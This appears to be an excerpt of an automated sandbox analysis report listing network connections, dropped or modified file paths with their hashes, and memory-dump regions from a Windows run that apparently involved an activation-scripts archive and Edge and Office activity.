| US | 152.199.19.161:443 | fp-vs.azureedge.net | tcp |
| US | 150.171.64.254:443 | ev2-ring.msedge.net | tcp |
| FR | 152.199.21.118:443 | static-ecst.licdn.com | tcp |
| GB | 23.213.251.133:443 | cxcs.microsoft.net | tcp |
| GB | 92.123.128.141:443 | www.bing.com | tcp |
| US | 150.171.84.254:443 | p-ring.msedge.net | tcp |
| US | 4.150.240.254:443 | arm-ring.msedge.net | tcp |
| US | 8.8.8.8:53 | ax-ring.msedge.net | udp |
| US | 150.171.28.254:443 | ax-ring.msedge.net | tcp |
| US | 8.8.8.8:53 | 141.128.123.92.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.84.171.150.in-addr.arpa | udp |
| US | 150.171.22.254:443 | ln-ring.msedge.net | tcp |
| US | 131.253.33.254:443 | a-ring-fallback.msedge.net | tcp |
| GB | 2.22.249.155:443 | ow1.res.office365.com | tcp |
| US | 8.8.8.8:53 | 155.249.22.2.in-addr.arpa | udp |
Files
C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Deployment\e440b98295230d470860686828cad356\System.Deployment.ni.dll
| MD5 | 056f22728c8c630c4034d8b07936ba1e |
| SHA1 | 0a9ed151742ac74d745f4a2a9f8891a191f29065 |
| SHA256 | ab1f07fa49a944c47b29d52ccaf1b926985ed230c2ba78cbbbcd578231a5f9e8 |
| SHA512 | 4bab3240e6e6fb2ddcf5fde7be516cf64c0c1882ba5c9da7163b8174d3883d4985c52c25a00f0b4e0dfd717980713775a614024afbeebeb6c5ec8fdeba22619f |
C:\Windows\assembly\NativeImages_v2.0.50727_64\LinqBridge\f1ac6cfcd7f7945010f005a8862c17c2\LinqBridge.ni.dll
| MD5 | 832c5a96e82427912ad90c7c6ef8f022 |
| SHA1 | 1be966903e09c9097dbe7f872c0463fafeb90444 |
| SHA256 | 2c8fc5ac5f91265987f473b071e8313ee2f707963e8ac128c54bc746ad1ee3be |
| SHA512 | c2130f5947d3200384e1af3b338b52535ffa5bbb9041662497ee25b08084f2ee084313f7c8ffb78de093a229f76e51157e3681da0b6cf2ad0875e6caf61262b2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\37a9d4cc-e80a-4a63-a9fc-cbcaca632c65.tmp
| MD5 | 5058f1af8388633f609cadb75a75dc9d |
| SHA1 | 3a52ce780950d4d969792a2559cd519d7ee8c727 |
| SHA256 | cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8 |
| SHA512 | 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 69fa7f6ffa2848ade334002f28f6adbd |
| SHA1 | 79ee34eb864ee1c9a47e9bb3de0c4801460e1a73 |
| SHA256 | 2e479f746996ec09310fa5887aed2f26956e548fe34ea684da029f82ef44d94c |
| SHA512 | 0c03a1fdd39f75eb42a4d8c6b8b9d42b1bb9eeb4bea5fa6b2ec1d9def30509db483ba6ad5b7bcb374c4c35ef82120a878cec56fe15679a157166eaeb23e9995d |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c5fa189180a4b32f88ffb066925097f1 |
| SHA1 | 5721143d57e6a3da34bec6f8dd4fc2100fd176b0 |
| SHA256 | 29c50b0dc78a7f30788cf85372def5836c50428c5a166ad787503020717366c4 |
| SHA512 | 2f4f263d2c43a103b8ff4a9c60c26e71808ba33eccad26a6cd2903cd1dea28bd62a3aa273989f27449d4348bb8c335d9f6b4ada902e9b7a6bf59c62676979073 |
memory/5532-1567-0x00000000007A0000-0x0000000000822000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | aefd77f47fb84fae5ea194496b44c67a |
| SHA1 | dcfbb6a5b8d05662c4858664f81693bb7f803b82 |
| SHA256 | 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611 |
| SHA512 | b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3 |
memory/5532-1578-0x000000001B4E0000-0x000000001B4EE000-memory.dmp
memory/5532-1580-0x000000001DBB0000-0x000000001DBBA000-memory.dmp
memory/5532-1579-0x000000001B7C0000-0x000000001B7D0000-memory.dmp
memory/5532-1581-0x000000001DBE0000-0x000000001DBFA000-memory.dmp
memory/3064-1582-0x0000000000F10000-0x0000000000F1A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\7ef1abac-aefa-41fe-b2fe-fb9edaf64b55.tmp
| MD5 | 226feb9cc2ea5ee22e535720ac0d3055 |
| SHA1 | 4c72ea13025783f339cbf176e37467b78fde2db2 |
| SHA256 | cafeb0e21dd6dd160153b082785a6d7bdd4ad0e3e07ef4f0a2ea352bedfa3e30 |
| SHA512 | ce356e1cc381f22362aa9737939c35b7470ed278cd1916e29a199b36d1f6d60d495561f921fd9c278edf2a5504bb8d2021f82a5753b1a8105de36ae5f32553bb |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | 828c52729e614cbbdd8435429eeef979 |
| SHA1 | 25ba6e4d82072335fd2be3094ba6a472bc8a9b96 |
| SHA256 | d74df6a3f1d61effd8c47ad42ae67f7ca4678af13dc31f6df47ca04a09a72834 |
| SHA512 | 0645ec876f94ec3137eadd19185251cb7d025209af5c6e4c937bf7f28b5dc950fef07dd346e611ca03750e3fafa34de04a40e0d0870f925b6288919d024057af |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c90bc55a73329d6546df66fcb040dbb6 |
| SHA1 | f3911c16cf6d4c1780ea2b33e7ae99ab31a6e032 |
| SHA256 | 59981fccdda4f5e9a41650df8e9fed528c0f36da1bde5988188b407ec904e142 |
| SHA512 | 1301cb7dde3852fc7fe7f31d8c1cabab65d3be52aba33f5181167e965b338a7128be663b646e8283935eda90af47971b6f093c0bb263e470148e5f8b349938e4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | ddaafff0605b874d17a1dc4321e07426 |
| SHA1 | b4552b0dbdbda4d8a11be0cbdc2105aadaadcc90 |
| SHA256 | 8418958edf58f3e5a7fa6a7da90b9bbc45b53001a24591ee1722d12bb1ab9fa6 |
| SHA512 | b642ea2e3220c1a26cf5129be628fee2ca27543cd3d4a89196db6d0888a65a6a4da0cd7945f723859bdc5afb8391bbd7606d69c5a49da04aa8cfd413feb3d644 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 5b9654655a99901b81081e02487f2335 |
| SHA1 | 8547d92e99a4975a26e710778a3d69b32e745ad4 |
| SHA256 | 316a4593ad95051e89625a5048b1ce14747bdf095b63b3389376830e1505220c |
| SHA512 | 13361da36d8094f6da35071f7780ff80615e1e04b08849790941c3781ea7519422727068127393c8a27262a6bf8b02368db042eb79e69519ec894667164e2212 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 5127e46a9873c403f2610fdb3a476488 |
| SHA1 | 29b414aed39ee47379a8f8c5b7cfa09e52b52a4f |
| SHA256 | 69053bb0a53aecee87b225e5371969f53d701a1ea7f4f2b11764758a91209a5e |
| SHA512 | 1d10b60affe2a355a191e88ce46e538e61b136b3a3a55adeb35650cc7c063aaf1ad712a10135b6d52cf490337b646f4347a2170d0150b581526e4c4aba83cc57 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 17f53dba7d9cb4da99891e48e9ed5934 |
| SHA1 | 1cb47228cd48ee02d36e0239f302697506484167 |
| SHA256 | 42462c3b6e3fa4816d47e3c7cafc05d73850db5641319048b7801fc40b888074 |
| SHA512 | f23d36e2e625a56f4b3b37b82ff287c42eeb99d0f441c559d3a823bdaa817cf21789fcea195e1053443fd4fee7281f8cb7b4f51f1d3b54fc458616eba37a6b91 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | b9f9bc535233d1152df79ac96bb76663 |
| SHA1 | 7deb3049550508cf20774f7756d8910966e9b886 |
| SHA256 | a36579e57038aef8bb810ea3d0731bd86db046b1b1ea245ccc440b68ebe6ed83 |
| SHA512 | 8d729b1d783bb2f77dbd87e37a4c40cb44b372b2434cc08ea519602141757fc86b1c3b3a8bcec825ad0ad9ad92fb378f50bec7cdd923e60cce7f2bd20d04bb39 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | b160a94b902968b62233b0749ffc6c97 |
| SHA1 | 2925c4a47b71ca9bf8380d07a689421c6ade1f43 |
| SHA256 | a1ce364c22aa526334abf0fb5c4533296ae6297745ba23522d5baadf0bddcb1d |
| SHA512 | c235eb5b19d7b1009eb0caf3b9f7cf5c45b98559c82d2b29e9f5bc97435a24ba281d58ebe4ad60fde41d760fcda0f69d1855b9faa49d195c0d2df1f7aed1aa16 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 8c93ca6ab441d54c5f6916850284226d |
| SHA1 | b3f14fa160333619abd549fd5ee3de58483baf19 |
| SHA256 | 329c6a070acd43e6addfcfcb92e2f87bc2302c64492056bbba6f0d1e19499cf6 |
| SHA512 | 68e1f1572047d807f0502175b4f0570e10ebcd43a7d69810d224de1f63a6bcc388e419260f838325e4f74a74342b77424001f2d474d9a10b3ef5ded82bc2edd3 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 0f86c6dfeb521dd28271136329fd0d66 |
| SHA1 | 5d398508565c345222115325a0eed079ab4911be |
| SHA256 | f5e3efb8b47ecea2a4bd10322a2cee3b8405297b00805e735370fc62c6233ac0 |
| SHA512 | 10e82018227460bf3081c383314f9b9b7f6a1340f4c66097998b04dff9410bec5aa30bc8cb11e9f12cc65da18419aded7c1eb572297517ab465965cd1228f906 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 22b16d5173981a536e8e2260b8e9b88d |
| SHA1 | 7d0f4943e593ca9bb328c118b0e25ca3129a0471 |
| SHA256 | d5bd527cc69127ac338c5bb9d71d2dba06ca81985d42d6698b7e0c0f7cbffa5b |
| SHA512 | f91a8fb90d58a89c9d04681d9841c380b4ab181d63bb8813a59b038a8d65b9d217b29b0ed419479b860016d8f54363a0e39d99a5771fad942f31d9d2f9ac9a1b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RXDPSXA6XH2DN30U8PY3.temp
| MD5 | 4fcb2a3ee025e4a10d21e1b154873fe2 |
| SHA1 | 57658e2fa594b7d0b99d02e041d0f3418e58856b |
| SHA256 | 90bf6baa6f968a285f88620fbf91e1f5aa3e66e2bad50fd16f37913280ad8228 |
| SHA512 | 4e85d48db8c0ee5c4dd4149ab01d33e4224456c3f3e3b0101544a5ca87a0d74b3ccd8c0509650008e2abed65efd1e140b1e65ae5215ab32de6f6a49c9d3ec3ff |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 589c49f8a8e18ec6998a7a30b4958ebc |
| SHA1 | cd4e0e2a5cb1fd5099ff88daf4f48bdba566332e |
| SHA256 | 26d067dbb5e448b16f93a1bb22a2541beb7134b1b3e39903346d10b96022b6b8 |
| SHA512 | e73566a037838d1f7db7e9b728eba07db08e079de471baca7c8f863c7af7beb36221e9ff77e0a898ce86d4ef4c36f83fb3af9c35e342061b7a5442ca3b9024d2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c371d2c48bdd45a780ae3f814ecb34f9 |
| SHA1 | 62606b6dd0a80a42d5ca4b50d32878965c27bccb |
| SHA256 | f6ce3bd88228081e78c8d91039addc8823fc1100b294cef4d3c333ef37ae85bf |
| SHA512 | 2520e2cda97738d05b629c1722520c4e5b63e4a8c80367d2e641bf71a85a2236640ea871e7150fa780b7864d4f141852eb381903d3fd48873df40316084ab412 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 52ff5a5c29bba21c47ad07dd82f9959d |
| SHA1 | e2c85d4db199c19006bdd8f9f153ab6987d81264 |
| SHA256 | 263b6cf2ace4310f46b69aa178396938651bcc8400849789b69e8d91863fb387 |
| SHA512 | 8aec1b9197a3ded28e5d18b339f070cf929960747ade16776418bc41fde14ce6b7c122d25abf249cc15142782f8b9ccb1dd7efc75baebd0b91d18ab9e998554c |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 1fe320a53f9ebf969e2ca97c84aea322 |
| SHA1 | e6546ae31197f47752f625989246b89500ab0fa6 |
| SHA256 | afd21b89e07d88c4fdbe89eae2cd73e61c534e77209979da2e9de917b41ac990 |
| SHA512 | 78fd98cf908da84ce2514395e6894211618273ccb3de2e38d1fffbe7cd9794f0cf2bf89b32eff569331cc58a77b5c126315c2a6fa659b3a163e0555b257701cc |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 343d0fe18f61d1c19e564ef1811c349b |
| SHA1 | f95fbc2393b322e0852232d5509c93ccc7eec297 |
| SHA256 | 94195f35a3d76c37a6db44fdda2ad2e2b417bda52905d6f712f4e2c98a4ced52 |
| SHA512 | 042238ea89ede8834524c16fc96bc0a055542d76e12733eefd7defe93b7869fa59e8a6aec1af2a4f526c4fdae15d06da513dbf68caabe4553114cb1b922fa9e1 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | da557336712c00c8ebd5bba26289af89 |
| SHA1 | 7eaf0db47039f7abb9f8fd135a116c30241ddb43 |
| SHA256 | fc7eb83d942a887c13aeeb0d799d4b915b7a305bf7b86cbde62a174839185fda |
| SHA512 | 9882f9eed9d3e82963c0a2dc4a66e183d41dd146a38519a284fc2b86de8e9d01fa1856783c774bb35b064dc4edde473557488c71d8e0e7db9ff486e206bc9441 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
| MD5 | 5410366d71e705ea9bde0128a306ccfa |
| SHA1 | 3f9166c1d4ca37c3cc5e1d8bb42a7c686bbf1224 |
| SHA256 | 38ca6b9f0318aded4d23ba7ed097dc253ff7ad1b312701921a2684794dc068bc |
| SHA512 | 4410ea631b63238fd85cd8583f371e11027de453f4ba7ec412f30f9eb4bb3fdc364f9f4de26073fa8be8aa9c260df83305e6e4705974167b069e7eeb0e0b29a4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe61f368.TMP
| MD5 | a21188ad9f40ee41f2a5c64dbec3698a |
| SHA1 | 0688131e72eda47dce3173e0f52e188f023bfed9 |
| SHA256 | 9a2741098678a553ecb7239a0dbb5c23083f7a7b6eaf47b3ec276567c759ca58 |
| SHA512 | e104a899253b37618168a47e5b65111cf68fe217ad19e1573e7eeb2f90f5800834436a546f946eab3e129b58cbcd6d708b2282d76fdb28d278561120600b3877 |
C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master.zip
| MD5 | bf0f1add95ef479d38db30554a4aede0 |
| SHA1 | e05b44aee0a9df0edaa7de4ad24fa18ad407075f |
| SHA256 | f798b0790fd6e62fb0ff0195c06f7c655ae0a55e1b3c9d6b4c28b7d5483ce6f6 |
| SHA512 | 2f4b4d50844db1064de7ac918738ab21621f7245434aeb74de2fd2baf0c4367ad4057e5c9ef810f09e5c374ac4e3ea8ab85d960d3549f72b763dccb2d37e8925 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 54a9c896232e4bdcdf46b0e453de1701 |
| SHA1 | 3564af531107d29de9eb9a815881d93ec8c21313 |
| SHA256 | f7be41f180ff23b35bc337a71ab1b1efae7ebaf89728496e4b1933481cabe749 |
| SHA512 | b8b663eb81614fd738e8af005b6ddeddcdee9087b33f05f6628e0a3079b414bf80a41d1016259dce06f427b71c8b696d12746cbe1c4dd088159fef999ebb6d9e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 44a10d47ce93c393fbca89128cbe1423 |
| SHA1 | bea24b64d3a8167ebd4334e815d7d8ceb97d9708 |
| SHA256 | 2dc91bd7c36f01a2c9bb04b01c33f24ab98b6fe65c83b5cac6368763b68e08ae |
| SHA512 | e63dfc397a009cc36dbb895ebcb93f075e24a465c75f57fe949b2182ee0b8ee6690f5910d49d7f78d5239df5c9853f8406f0a64bf315b34ac9e82f3186176bc7 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 46992062da814e698de5813c518bf0f5 |
| SHA1 | 58119e38ab2032dd9f0dc17501f2e09896e8dda6 |
| SHA256 | 56de75a94dda498d65ce90881afb1cdfd6b5ffb878fec9b47d930159333d804f |
| SHA512 | 4b16ecb871113f546bb650f871bdd55b2cc397b646d7aeb674359c53120ea02580f25b4460d47993de3718eaec9267654fd6bc6f59ce77589f99881543d401cf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | a7dc262c080fc8f9866c372520c6d571 |
| SHA1 | 0a2a2cad59fe32142062821abd919968851f6074 |
| SHA256 | 4bbfc2dbf72731c4545734c5bccad0c4d76f589adf1244eac3a5d7a655736ba7 |
| SHA512 | 301edaae94e22905f5ad7a9a435fd617a6030e0a84696e035051ec41b9c2379ab4aa15e0b3056ec08ac4b9a3a945f974254bef63d84150d72675b7f22988105f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 7d7f490ab1a5145cfa3256f530412c89 |
| SHA1 | 990fc8bdcc590d51585c2dc529ba95f0776a731d |
| SHA256 | fc9358528734ffc7ef02d0ef667b06a181b7b1dc28baa557b201371035b262ca |
| SHA512 | a5d146059e166785e74f721b32f2d4a16778ff76f52d57eec4db91c9685311c4d68cce1043e18f36bac1f22e88ae45c808dc26c351f631110b41cb197394a949 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 17da28cb77e424ac192ff9447cb2c4c8 |
| SHA1 | 7f36ac1179871a6b618862f7267083479201c3c9 |
| SHA256 | cf606aec00453d80b82320ac2e0e8deb38a6e57ca58739cde71673f563399d80 |
| SHA512 | 2c59ac5cbe9a38b7010d37b939feb5ff3f0f6210defdc88bbdf27d81b5b2a66083809f2cf973f63aa84b1d9ad7eb2444ed7c2b78f47cc803548200a21d091e3b |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_flgb5wjn.mlg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 446dd1cf97eaba21cf14d03aebc79f27 |
| SHA1 | 36e4cc7367e0c7b40f4a8ace272941ea46373799 |
| SHA256 | a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf |
| SHA512 | a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7 |
memory/1712-2598-0x0000029848180000-0x00000298482F6000-memory.dmp
memory/1712-2599-0x0000029848510000-0x000002984871A000-memory.dmp
C:\ProgramData\Microsoft\Windows\ClipSVC\GenuineTicket\GenuineTicket
| MD5 | 923ce4120dffd5255bfccd38b53d9403 |
| SHA1 | 49a6ee78cc1616864e2e35b76396add0452ee09c |
| SHA256 | f7a53c5a32dd9fbd55a36bdb756f33ecf0f42f25eca8b6fafabd1fc516659e24 |
| SHA512 | 5338a2425a753c1438447c1715443d3be21013e0a665a5b1c0ac1f1ecf474368bff9ad131ac7e8f94b4a75cfaa74fb976661d90181ca6ada109492efefdc1568 |
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | f55463b1a128efa903fb629adca6b7ce |
| SHA1 | fecee0b79e29631248a83cf89728c5a8f0784a0f |
| SHA256 | f71f289fd5193e28ab535eb1905d625680a120b800679a4c85c3b8b0c191aa5a |
| SHA512 | 39db33612b5b8702e1e3983def08c039fabf368aeb55c5d4147806f3fcd79da4f4c8cec6fed04b02fa41e55eaba4cfc4d1820c148737cf02379f01acc598008a |
C:\Users\Admin\Desktop\Baif oc -efjie.pptx
| MD5 | a929d0cc07ca52a3e84dfb0aa4a904ad |
| SHA1 | e63098355e5f94f75646aebbc3c137d8ca069350 |
| SHA256 | 1119508499e37575904be55842820c0c993175e490364b76ceca0d92600aa378 |
| SHA512 | 5a8cb35926c43f6461e674c4757947a664f75b2be181c42208aa0e86c293618fab5e1b2884cd4bf729243ace5e26123635654dd7c892b2c6d5fde310fc2fa4d5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d00655d2aa12ff6d.customDestinations-ms
| MD5 | f89d917428aa9ed8b93133b915aa8562 |
| SHA1 | b4b6a45d4da59e0b509ebba7448ba9d9c763e8b2 |
| SHA256 | 48b896e32c43849347f9b7277a22734d1fcc2720125892ff2c0bb259876c1994 |
| SHA512 | a8ed8e829b91f8d5b1b4d3bd5ffd145f53b3bb2f2720874f70ffd472188dca6c06659d3929fb96313d7e22fe46da0d275f5445877337ef2b7f461a5866bd0dcc |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Powerpoint.CampaignStates.json
| MD5 | f1b59332b953b3c99b3c95a44249c0d2 |
| SHA1 | 1b16a2ca32bf8481e18ff8b7365229b598908991 |
| SHA256 | 138e49660d259061d8152137abd8829acdfb78b69179890beb489fe3ffe23e0c |
| SHA512 | 3c1f99ecc394df3741be875fbe8d95e249d1d9ac220805794a22caf81620d5fdd3cce19260d94c0829b3160b28a2b4042e46b56398e60f72134e49254e9679a4 |
C:\Users\Admin\AppData\Local\Microsoft\Office\16.0\Floodgate\Powerpoint.SurveyEventActivityStats.json
| MD5 | 6ca4960355e4951c72aa5f6364e459d5 |
| SHA1 | 2fd90b4ec32804dff7a41b6e63c8b0a40b592113 |
| SHA256 | 88301f0b7e96132a2699a8bce47d120855c7f0a37054540019e3204d6bcbaba3 |
| SHA512 | 8544cd778717788b7484faf2001f463320a357db63cb72715c1395ef19d32eec4278bab07f15de3f4fed6af7e4f96c41908a0c45be94d5cdd8121877eccf310d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d00655d2aa12ff6d.customDestinations-ms
| MD5 | 7989c2f0f3622677a859da707fd63c6d |
| SHA1 | 06442c4cef1d388fd67d55478082560a3c68691f |
| SHA256 | f0c5f10e0d3b59dfacc5594774a7f58bc3b2c6ae76ff8fa3fcaaacf033e5ac69 |
| SHA512 | e0f205e19c92d2d0d61007f325c77725b53d101638d6a6cc77acf2e41ad89e7804b8c5d76c66941c6debd060cb5fc094efbf5c9e21a1272803dbdae840515d47 |
C:\Users\Admin\AppData\Local\Microsoft\Office\DLP\mip\logs\mip_sdk.miplog
| MD5 | fe308d716c65a83f4b80eaeb5f6761fe |
| SHA1 | 867d029792faa49b16b8c27a030a50667f9ec147 |
| SHA256 | 362f35c4f957dff230c8b6e8e1a9208619db47f22c3a84f2d91866aad3d8de0e |
| SHA512 | 57076ede3a44adbf2ebae24d6e0bffdd089c7bc81fc7c8ce6a7ac5bc2eabb2f4d28e4ec6a0e8ca70d7056fd35c0a0bdd3c7f8f776b90ecd32f03533e2aee2161 |